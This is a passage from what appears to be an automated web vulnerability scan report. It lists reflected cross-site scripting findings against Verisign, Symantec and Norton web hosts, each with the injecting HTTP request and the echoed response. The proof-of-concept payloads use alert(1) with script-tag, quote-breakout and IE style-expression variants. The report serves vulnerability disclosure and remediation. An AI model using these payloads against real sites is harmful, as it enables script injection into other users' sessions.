Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:35 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-fa51be9b
X-Pad: avoid browser bug
Content-Length: 26322
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:35 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
Player",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer235820917_10kbk3k",a,d,"transparent61651
alert(1)//96a754f882a","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<table width="'+a+'
...[SNIP]...

3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://press.verisign.com
Path:	/easyir/customrel.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 11807--><script>alert(1)</script>5053ee4c92a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /easyir/customrel.do?11807--><script>alert(1)</script>5053ee4c92a=1 HTTP/1.1
Host: press.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet/3.0; JBossAS-6
Content-Length: 1328
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <script>alert(1)</script>5053ee4c92a=1
<br/>
...[SNIP]...

3.25. https://renewals.symantec.com/renewals/application [entry_point parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/application

Issue detail

The value of the entry_point request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f20"%3balert(1)//6e6ee0889dd was submitted in the entry_point parameter. This input was echoed as 96f20";alert(1)//6e6ee0889dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:32:03 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store
Content-Length: 21464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<!-- BEGIN
...[SNIP]...
= "null";
var cookieDays = 20;
var idVisitor = "null";
if (idVisitor != "null") {
   s_2.visitorID = idVisitor;
   s_2.visitorID = s_2.visitorID.replace("-", "_hyphen_");
}
s_2.campaign="WEB_sym_lrc96f20";alert(1)//6e6ee0889dd";
if (s_2.campaign == "null")
   s_2.campaign = "WEB";
s_2.currency="USD";
var friendlyEvents = "";
if (emailSent == "Y") {
   if (s_2.campaign != "null") {
       var r_email = s_2.getValOnce(s_2.campa
...[SNIP]...

3.26. http://updatecenter.norton.com/ [NUCLANG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://updatecenter.norton.com
Path:	/

Issue detail

The value of the NUCLANG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 was submitted in the NUCLANG parameter. This input was echoed as 5366c"style="x:expression(alert(1))"0c17ca574c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?NUCLANG=en5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 HTTP/1.1
Host: updatecenter.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:46:07 GMT
Connection: close
Content-Length: 25501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr">
<head id="ctl00_Head1"><t
...[SNIP]...
<input type="hidden" id="LangSelected" value="en5366c"style="x:expression(alert(1))"0c17ca574c1" />
...[SNIP]...

3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/business/verisign/fraud-detection-service

Issue detail

The value of the tid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed59"><script>alert(1)</script>0e8182bf4be was submitted in the tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/verisign/fraud-detection-service?tid=gnps6ed59"><script>alert(1)</script>0e8182bf4be HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 54792
Cache-Control: public, max-age=3563
Date: Fri, 09 Sep 2011 21:31:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Risk-Based Authentication, Fraud Detection, Identity Theft Protection - Veri
...[SNIP]...
<meta name="om.page_name" content="en/us: biz: products: overview: information risk & compliance: verisign identity protection fraud detection service: gnps6ed59"><script>alert(1)</script>0e8182bf4be"/>
...[SNIP]...

3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2722'-alert(1)-'9a6003db3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /connect/sitesc2722'-alert(1)-'9a6003db3b/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:22 +0000
Vary: Cookie
ETag: "1315604062"
Content-Type: text/html; charset=utf-8
Content-Length: 29479
X-Varnish: 1369354182
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesc2722'-alert(1)-'9a6003db3b/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ee12'-alert(1)-'de74577dedc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /connect/sites/default4ee12'-alert(1)-'de74577dedc/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:27 +0000
Vary: Cookie
ETag: "1315604067"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330105
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default4ee12'-alert(1)-'de74577dedc/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbc'-alert(1)-'1d8cd1c6f5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:33 +0000
Vary: Cookie
ETag: "1315604073"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330192
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc09'-alert(1)-'d98c9c18875 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:39 +0000
Vary: Cookie
ETag: "1315604079"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330249
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55f45'-alert(1)-'cc1ecd4f4c2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:45 +0000
Vary: Cookie
ETag: "1315604085"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354450
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be710'-alert(1)-'6137fcbfa0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520se